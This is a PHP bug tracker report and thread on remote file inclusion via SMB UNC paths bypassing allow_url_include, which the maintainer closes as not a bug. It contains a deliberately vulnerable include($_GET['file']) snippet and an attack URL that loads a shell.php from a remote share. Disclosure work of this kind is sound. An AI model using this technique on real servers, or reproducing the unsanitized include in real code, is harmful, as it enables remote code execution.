php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #78005 Remote File Inclusion protection bypass in PHP version 7.1.29
Submitted: 2019-05-12 11:27 UTC Modified: 2019-05-13 15:40 UTC
From: manish1046 at gmail dot com Assigned: cmb (profile)
Status: Not a bug Package: Filter related
PHP Version: 7.1.29 OS: Windows
Private report: No CVE-ID: None
 [2019-05-12 11:27 UTC] manish1046 at gmail dot com
Description:
------------
I was performing Remote File Inclusion attack against an following vulnerable code

<?php 
include($_GET['file']);
?>

In PHP.ini file, I changed the settings just for 'allow_url_fopen' and set it to "Off". 'allow_url_include' is also set to "Off". 

When I tried to include PHP code file hosted remotely (over HTTP), vulnerable code did not include the PHP code from remote URL.
But PHP has behaviour and it make request to SMB share even if it is hosted remotely.

Now, when I configured SMB share with anonymous read access enabled on it and hosted PHP code on that share, when asked PHP vulnerable code to including the PHP code hosted over SMB, it worked.
For example,

http://192.168.56.103/vuln.php?file=\\remote_ip\share_name\shell.php

When performing this test, 'allow_url_fopen' and 'allow_url_include', both are set to "Off". 


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2019-05-13 12:00 UTC] cmb@php.net
-Status: Open +Status: Feedback -Assigned To: +Assigned To: cmb
 [2019-05-13 12:00 UTC] cmb@php.net
So basically vuln.php is doing:

  <?php
  include('\\remote_ip\share_name\shell.php');

Since UNC paths are not URLs, they are not subject to allow_url_*.
Am I missing something?
 [2019-05-13 12:14 UTC] manish1046 at gmail dot com
-Status: Feedback +Status: Assigned
 [2019-05-13 12:14 UTC] manish1046 at gmail dot com
Hello,

Yes, you are right. 
So in this case PHP is not going to block the Remote URL inclusion? Is this the expected behaviour?

And one more thing, what if code is including URL from webdav URLs.
For example:

<?php 

include('//remote_ip/file.php');

?> 

Again, in this case also PHP is not going to prevent it?

Thank You
Manish
 [2019-05-13 14:04 UTC] cmb@php.net
-Status: Assigned +Status: Not a bug
 [2019-05-13 14:04 UTC] cmb@php.net
PHP doesn't regard UNC file paths as URLs, so these are not
affected by the allow_url_* INI directives.
 [2019-05-13 15:40 UTC] manish1046 at gmail dot com
Oh. Thank You for your time and explanation.
Take care (y)
 
PHP Copyright © 2001-2020 The PHP Group
All rights reserved.
Last updated: Tue Sep 29 15:01:25 2020 UTC